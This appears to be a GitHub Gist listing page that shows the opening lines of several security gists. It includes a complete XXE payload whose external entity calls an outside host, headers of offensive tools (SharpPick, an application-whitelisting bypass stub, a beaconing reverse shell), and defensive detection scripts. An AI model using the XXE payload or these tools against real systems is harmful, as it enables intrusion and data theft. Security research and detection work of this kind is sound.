Skip to content

Instantly share code, notes, and snippets.

@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@mattifestation
mattifestation / CIPolicyParser.ps1
Last active March 13, 2024 19:48
Functions to recover information from binary Windows Defender Application Control (WDAC) Code Integrity policies.
# Ensure System.Security assembly is loaded.
Add-Type -AssemblyName System.Security
function ConvertTo-CIPolicy {
<#
.SYNOPSIS
Converts a binary file that contains a Code Integrity policy into XML format.
Author: Matthew Graeber (@mattifestation)
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@Paradoxis
Paradoxis / php-modules-hasher.py
Last active February 22, 2020 13:45
Hashes all PHP modules to keep track of their integrity
from argparse import ArgumentParser
from subprocess import Popen, PIPE
from hashlib import sha1
from os import path, walk
import re
import os
from sys import stderr
def extension_dir():
@bneg
bneg / SharpPick.cs
Last active November 27, 2022 20:56
/*
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
*
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
*
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
*/
/*
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
*
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
*
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
*/
<#
The purpose of this script is to attempt to set off alarms on security products.
#>
function Get-RandomString {
# Get-RandomString.ps1
# Written by Bill Stewart (bstewart@iname.com)
#requires -version 2
@magisterquis
magisterquis / demoshell.go
Last active April 1, 2024 12:12
Beaconing shell, useful for demos. Catch it with netcat.
// demoshell is a nifty beaconing shell useful for demos
package main
/*
* demoshell.go
* Simple reverse shell used in demos
* By J. Stuart McMurray
* Created 20180331
* Last Modified 20180331
*/
@mattifestation
mattifestation / CollectDotNetEvents.ps1
Created August 27, 2018 21:50
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass
# logman stop dotNetTrace -ets
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe
# I got the process ID by running a procmon trace
$TargetProcessId = 8256
@coolbrg
coolbrg / powershell.go
Last active March 1, 2024 09:35
Playing PowerShell command via Golang
package main
import (
"bytes"
"fmt"
"os/exec"
"strings"
)
// PowerShell struct